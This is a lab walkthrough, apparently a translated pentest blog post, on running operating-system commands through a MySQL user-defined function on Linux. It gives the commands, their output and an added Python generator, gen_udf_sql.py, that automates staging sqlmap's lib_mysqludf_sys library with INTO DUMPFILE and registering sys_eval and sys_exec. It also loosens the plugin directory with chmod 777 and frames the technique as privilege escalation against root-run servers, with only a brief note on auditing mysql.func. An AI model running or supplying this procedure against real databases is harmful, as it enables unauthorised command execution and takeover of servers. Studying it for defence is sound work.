Environment: OS: Linux (BackTrack 5); database: MySQL

Description: execute arbitrary operating-system commands through a MySQL user-defined function (UDF). Only the Linux case was tested; on Windows the procedure is the same in outline, but the library loaded is naturally a DLL rather than a .so.

Requirements: the mysql database must have the func table (mysql.func), and UDF loading is disabled when the server is started with --skip-grant-tables. The account used also needs the FILE privilege (to write the library with INTO DUMPFILE) and INSERT on the mysql database (CREATE FUNCTION records the UDF in mysql.func); if secure_file_priv restricts where the server may write files, the library cannot be dropped into the plugin directory this way.

Procedure:
1. Obtain the plugin directory path (MySQL 5.1 and later load UDF libraries only from plugin_dir).
2. Find the UDF library file for the target operating system and architecture.
3. Write the library into the plugin directory, load a function from it and execute a command.

1. Obtain the plugin directory path:
mysql> show variables like "%plugin%";
+---------------+-----------------------+
| Variable_name | Value                 |
+---------------+-----------------------+
| plugin_dir    | /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)
2. Find the UDF library file for the target operating system; check the word size of the host yourself. This one is 64-bit:

root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

For the UDF file you only need to pick the one for the matching operating system and word size from sqlmap's udf directory:
root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux  windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
32  64
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so
3. Use the UDF library file to load the function and execute a command. First obtain the hexadecimal form of the library; locally that can be done with:

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)

Because in my test mysqld ran under my own account, mysql, rather than root, it could not write to the plugin directory. In reality a UDF privilege escalation generally targets a mysqld started with root permissions, so the directory permissions are not a problem. To continue I loosened the directory permissions:

root@bt:~# chmod 777 /usr/lib/mysql/plugin

Then write the UDF library into the MySQL plugin directory from inside the database (INTO DUMPFILE writes the raw bytes, without the escaping and line terminator that INTO OUTFILE would add):

mysql> select unhex('7f454c46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)

View the functions exported by this UDF library:
root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
                 w _Jv_RegisterClasses
0000000000201788 A __bss_start
                 w __cxa_finalize
                 w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
                 U fgets
                 U fork
                 U free
                 U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
                 U malloc
                 U mmap
                 U pclose
                 U popen
                 U realloc
                 U setenv
                 U strcpy
                 U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
                 U sysconf
                 U system
                 U waitpid
Finally, load the function and execute a command:
mysql> create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)

mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql              |
+--------------------+
1 row in set (0.04 sec)

mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name     | ret | dl          | type     |
+----------+-----+-------------+----------+
| sys_eval |   0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set

The command runs with the privileges of the operating-system user that mysqld runs as, which is why whoami returns mysql here; the technique only yields root when the server itself runs as root. The row in mysql.func is the persistent record of the loaded function: it is what a defender should audit (together with unexpected files in plugin_dir), and DROP FUNCTION sys_eval removes it.
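As an added example (not part of the original post and not sqlmap's own code), the following Python script turns steps 1 to 3 into one generated SQL script: given the library file and the plugin_dir value obtained in step 1, it checks the ELF header so a 32-bit library is not pushed to a 64-bit server (the mistake step 2 guards against), hex-encodes the file exactly as hex(load_file()) does, and emits the SELECT unhex(...) INTO DUMPFILE and CREATE FUNCTION ... SONAME statements from step 3. Assumptions: the script name gen_udf_sql.py is hypothetical; the return types (sys_eval STRING, sys_exec INTEGER) follow lib_mysqludf_sys's own definitions; the 1 MiB max_allowed_packet limit is the MySQL 5.x default and is only a sanity check, not a value read from the server.

```python
#!/usr/bin/env python3
"""Generate the SQL that stages a MySQL UDF library and registers its functions.

Added example for this page (hypothetical gen_udf_sql.py, not sqlmap's code).
Usage: gen_udf_sql.py lib_mysqludf_sys.so /usr/lib/mysql/plugin | mysql -u root -p
"""
import binascii
import sys

ELF_MAGIC = b"\x7fELF"        # 7f454c46, the prefix visible in the hex dump above
ELF_CLASS = {1: 32, 2: 64}    # e_ident[EI_CLASS]: ELFCLASS32 / ELFCLASS64
# Assumption: MySQL 5.x default max_allowed_packet (1 MiB); adjust to the target.
DEFAULT_MAX_PACKET = 1 * 1024 * 1024
# Assumption: return types as declared by lib_mysqludf_sys for these two functions.
DEFAULT_FUNCTIONS = (("sys_eval", "STRING"), ("sys_exec", "INTEGER"))


def elf_class(so_bytes):
    """Return 32 or 64 from the ELF header, raising if this is not an ELF object."""
    if len(so_bytes) < 5 or so_bytes[:4] != ELF_MAGIC:
        raise ValueError("not an ELF object; the server would refuse to dlopen() it")
    try:
        return ELF_CLASS[so_bytes[4]]
    except KeyError:
        raise ValueError("unknown ELF class byte %d" % so_bytes[4])


def sql_quote(text):
    """Single-quote a string literal for MySQL, escaping backslash and quote."""
    return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_udf_statements(so_bytes, plugin_dir, soname="mysqludf.so",
                         functions=DEFAULT_FUNCTIONS, target_bits=64,
                         max_packet=DEFAULT_MAX_PACKET):
    """Return the statements that write the library and register its UDFs.

    Mirrors the manual steps: the whole file as one unhex() literal written with
    INTO DUMPFILE (raw bytes, no escaping or line terminator, unlike INTO OUTFILE),
    followed by one CREATE FUNCTION ... SONAME per exported function.
    """
    bits = elf_class(so_bytes)
    if bits != target_bits:
        raise ValueError("library is %d-bit but target is %d-bit" % (bits, target_bits))
    path = plugin_dir.rstrip("/") + "/" + soname
    hex_blob = binascii.hexlify(so_bytes).decode("ascii")
    dump = "SELECT unhex('%s') INTO DUMPFILE %s;" % (hex_blob, sql_quote(path))
    if len(dump) > max_packet:
        raise ValueError("statement exceeds max_allowed_packet (%d bytes)" % max_packet)
    stmts = [dump]
    for name, rettype in functions:
        stmts.append("CREATE FUNCTION %s RETURNS %s SONAME %s;"
                     % (name, rettype, sql_quote(soname)))
    return stmts


def main(argv):
    if len(argv) != 3:
        sys.stderr.write("usage: %s <udf library .so> <plugin_dir>\n" % argv[0])
        return 2
    with open(argv[1], "rb") as fh:
        so_bytes = fh.read()
    for stmt in build_udf_statements(so_bytes, argv[2]):
        print(stmt)
    print("SELECT * FROM mysql.func;")   # confirm the registration, as the page does
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The generated script still runs subject to the requirements above: the account needs FILE and INSERT on mysql, secure_file_priv must not exclude plugin_dir, and the directory must be writable by the mysqld process, exactly as in the chmod step.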